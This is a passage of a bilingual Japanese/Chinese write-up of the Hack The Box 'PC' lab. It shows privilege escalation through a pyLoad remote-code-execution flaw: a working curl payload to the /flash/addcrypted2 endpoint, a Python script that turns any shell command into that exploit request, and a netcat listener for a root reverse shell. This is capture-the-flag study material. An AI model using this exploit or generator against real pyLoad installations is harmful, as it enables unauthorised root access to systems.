上面的这个人。 啪… 我很好奇,所以让我们查一下。

pyload 皮负载

何やらファイルをアップロードダウンロードする奴のよう。どのPortでサービスが動いているか確認してみる。(Pythonサービスだし、8000じゃないの?)
这就像一个下载文件的人。 检查服务正在运行的端口。 (这是一个 Python 服务,不是 8000 吗? )

sau@pc:~$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN     
tcp        0    244 10.129.93.227:22        10.10.14.97:40542       ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 :::50051                :::*                    LISTEN     
udp        0      0 127.0.0.53:53           0.0.0.0:*                          
udp        0      0 0.0.0.0:68              0.0.0.0:*  

8000に立ってました。このサービスをKaliマシンで確認するためにPortフォワードします。
我站在8000。 端口转发以在 Kali 计算机上验证此服务。

一旦SSHを切断し、以下のコマンドで再度SSHログインをします。
断开 SSH 连接,然后使用以下命令重新登录。

┌──(root㉿kali)-[~/work/go]
└─# ssh -L 8888:127.0.0.1:8000 [email protected]
[email protected]'s password: 
Last login: Tue May 23 14:19:36 2023 from 10.10.14.97
sau@pc:~$ 
sau@pc:~$ 

8888に転送させたので8888にアクセスし、実際にサービスが起動しているか確認する。
由于它已转移到 8888,请访问 8888 并检查服务是否实际启动。

【Hack The Box】PC【WriteUp】
しっかり立ってました。こいつの脆弱性を調べてみようと思います。
我站稳了脚跟。 我将调查此漏洞。

RCE vuln RCE 漏洞

vuln test 漏洞测试

pyloadの脆弱性を調べてみると以下のRCEの脆弱性のお話があった。
当我调查 pyload 漏洞时,我发现了以下 RCE 漏洞。

此奴を試していこうと思う。上記記事のPayloadの以下curlコマンドを試してみる。/tmp階層にファイルを作成するといったものだ。
我要试试这个人。 在上述文章的有效负载中尝试以下 curl 命令。 /tmp 这就像在层次结构中创建文件一样。

curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8888' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
    --data-binary $'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%74%6f%75%63%68%20%2f%74%6d%70%2f%70%77%6e%64%22%29;f=function%20f2(){};&passwords=aaaa' \
    $'http://127.0.0.1:8888/flash/addcrypted2'

確認する。 确认。

sau@pc:/tmp$ ls -lta
total 60
drwxrwxrwt 15 root root 4096 May 23 15:34 .
-rw-r--r--  1 root root    0 May 23 14:48 pwnd
drwx------  2 sau  sau  4096 May 23 14:34 tmpj8bo1dnt
drwx------  2 root root 4096 May 23 10:32 vmware-root_730-2999460803
drwxr-xr-x  4 root root 4096 May 23 10:31 pyLoad
drwx------  2 root root 4096 May 23 10:31 tmp0x7zev2m
drwx------  3 root root 4096 May 23 10:31 snap-private-tmp
drwx------  3 root root 4096 May 23 10:31 systemd-private-eacc7f50a01e4cb1b05c81d7e3495443-systemd-resolved.service-k0Ag6g
drwx------  3 root root 4096 May 23 10:31 systemd-private-eacc7f50a01e4cb1b05c81d7e3495443-ModemManager.service-cxfurj
drwx------  3 root root 4096 May 23 10:31 systemd-private-eacc7f50a01e4cb1b05c81d7e3495443-systemd-logind.service-5wLqEg
drwxrwxrwt  2 root root 4096 May 23 10:31 .ICE-unix
drwxrwxrwt  2 root root 4096 May 23 10:31 .Test-unix
drwxrwxrwt  2 root root 4096 May 23 10:31 .X11-unix
drwxrwxrwt  2 root root 4096 May 23 10:31 .XIM-unix
drwxrwxrwt  2 root root 4096 May 23 10:31 .font-unix
drwxr-xr-x 21 root root 4096 Apr 27 15:23 ..

ファイルが出来ているので攻撃は成功していると判断した。
由于文件已准备就绪,我们判断攻击成功。

脆弱性は存在するようである。  该漏洞似乎存在。

Tool Create 工具创建

このcurlコマンドの文字列を自動で生成するようなToolを作成してPayloadを軽く投げれるようにした。
我创建了一个自动生成一串 curl 命令的工具,以便可以轻量级地抛出有效负载。

以下がそのToolだ。  这是工具:
※このBoxってコーディング多すぎ?  * 这个盒子是不是编码太多了?

curl.py
import sys

def urlencode(string):
    urlencode = ""
    
    for char in string:
      decimal = ord(char)
      urlencode += "%" + hex(decimal)[2:]
      
    return urlencode
  
encode=urlencode(sys.argv[1])
print(encode)
print("\n")

curl_cmd = f"curl -i -s -k -X $'POST' -H $'Host: 127.0.0.1:8888' -H $'Content-Type: application/x-www-form-urlencoded' --data-binary $'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22{encode}%22%29;f=function%20f2(){{}};&passwords=aaaa' $'http://127.0.0.1:8888/flash/addcrypted2'"
           
print(curl_cmd)

超簡単ですが、だいぶ楽になります。 这超级简单,但它使它变得容易得多。
実際にping -c 3のRCEを試して見ます。
ping -c 3 让我们实际尝试RCE。

【Hack The Box】PC【WriteUp】
うん。うまいこと出来てるみたいです。  是的。 它似乎做得很好。
じゃぁ本番いきます。  然后我会去看真实的东西。

Reverse Shell 反壳

御用達の以下サイトを参考にReverseShellのコマンドを作成
通过参考以下站点创建反向外壳命令

リバースシェル確立のために受け側を用意しておく。
准备接收器以进行反向外壳建立。

┌──(root?kali)-[~/work]
└─# nc -lnvp 4444           
listening on [any] 4444 ...

色々と試してみると、busybox経由だとうまくコマンドが通った。
当我尝试各种事情时, busybox 命令通过 传递得很好。

【Hack The Box】PC【WriteUp】
【Hack The Box】PC【WriteUp】
これでRoot権限ゲットだぜ!!!!  现在您拥有根权限!!

まとめ 总结

【Hack The Box】PC【WriteUp】
これで特権昇格に成功し、Root権限奪取に成功しました。
您现在已成功升级权限并成功获得根权限。

Easy詐欺レベルで難しかったです。コーディングさせ過ぎ!!(笑)
在骗局层面,容易是困难的。 编码太多!! (笑)

Goを久しぶりに触って、もう全然覚えてなくて終ってました。GPTさんマジで感謝です。
好久没碰围棋了,完全不记得了。 非常感谢GPT。

今回もセキュリティエンジニアの皆さんの助けになればなと思います。
我希望这次也能帮助安全工程师。

原文始发于@schectman-hell(tak Yassan)【Hack The Box】PC【WriteUp】

版权声明:admin 发表于 2023年10月10日 上午10:27。
转载请注明:【Hack The Box】PC【WriteUp】 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...